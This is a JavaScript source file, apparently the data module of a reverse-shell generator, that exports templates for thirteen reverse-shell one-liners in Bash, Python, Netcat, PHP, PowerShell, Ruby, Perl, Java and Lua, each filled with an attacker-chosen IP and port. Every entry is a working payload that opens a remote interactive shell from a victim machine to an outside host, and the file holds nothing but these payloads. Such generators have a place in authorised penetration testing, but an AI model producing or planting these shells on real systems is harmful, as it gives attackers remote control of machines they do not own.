export const shells = [
  {
    id: 'bash-tcp',
    name: 'Bash',
    subtype: 'TCP',
    color: 'mint',
    template: (ip, port) => `bash -i >& /dev/tcp/${ip}/${port} 0>&1`,
  },
  {
    id: 'bash-udp',
    name: 'Bash',
    subtype: 'UDP',
    color: 'mint',
    template: (ip, port) => `bash -i >& /dev/udp/${ip}/${port} 0>&1`,
  },
  {
    id: 'python3',
    name: 'Python3',
    subtype: 'TCP',
    color: 'lavender',
    template: (ip, port) => `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${ip}",${port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'`,
  },
  {
    id: 'python2',
    name: 'Python2',
    subtype: 'TCP',
    color: 'lavender',
    template: (ip, port) => `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${ip}",${port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'`,
  },
  {
    id: 'nc-e',
    name: 'Netcat',
    subtype: '-e flag',
    color: 'gold',
    template: (ip, port, shell) => `nc -e ${shell} ${ip} ${port}`,
  },
  {
    id: 'nc-mkfifo',
    name: 'Netcat',
    subtype: 'mkfifo',
    color: 'gold',
    template: (ip, port, shell) => `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|${shell} -i 2>&1|nc ${ip} ${port} >/tmp/f`,
  },
  {
    id: 'php',
    name: 'PHP',
    subtype: 'TCP',
    color: 'rose',
    template: (ip, port, shell) => `php -r '$sock=fsockopen("${ip}",${port});exec("${shell} -i <&3 >&3 2>&3");'`,
  },
  {
    id: 'php-exec',
    name: 'PHP',
    subtype: 'exec',
    color: 'rose',
    template: (ip, port, shell) => `php -r '$sock=fsockopen("${ip}",${port});$proc=proc_open("${shell} -i", array(0=>$sock,1=>$sock,2=>$sock), $pipes);'`,
  },
  {
    id: 'powershell',
    name: 'PowerShell',
    subtype: 'TCP',
    color: 'sky',
    template: (ip, port) => `powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('${ip}',${port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"`,
  },
  {
    id: 'ruby',
    name: 'Ruby',
    subtype: 'TCP',
    color: 'rose',
    template: (ip, port, shell) => `ruby -rsocket -e'f=TCPSocket.open("${ip}",${port}).to_i;exec sprintf("${shell} -i <&%d >&%d 2>&%d",f,f,f)'`,
  },
  {
    id: 'perl',
    name: 'Perl',
    subtype: 'TCP',
    color: 'sky',
    template: (ip, port, shell) => `perl -e 'use Socket;$i="${ip}";$p=${port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("${shell} -i");};'`,
  },
  {
    id: 'java',
    name: 'Java',
    subtype: 'Runtime',
    color: 'gold',
    template: (ip, port, shell) => `Runtime r = Runtime.getRuntime();\nProcess p = r.exec(new String[]{"${shell}","-c","exec 5<>/dev/tcp/${ip}/${port};cat <&5 | while read line; do $line 2>&5 >&5; done"});\np.waitFor();`,
  },
  {
    id: 'lua',
    name: 'Lua',
    subtype: 'TCP',
    color: 'sky',
    template: (ip, port) => `lua -e "require('socket');require('os');t=socket.tcp();t:connect('${ip}','${port}');os.execute('/bin/sh -i <&3 >&3 2>&3');"`,
  },
]
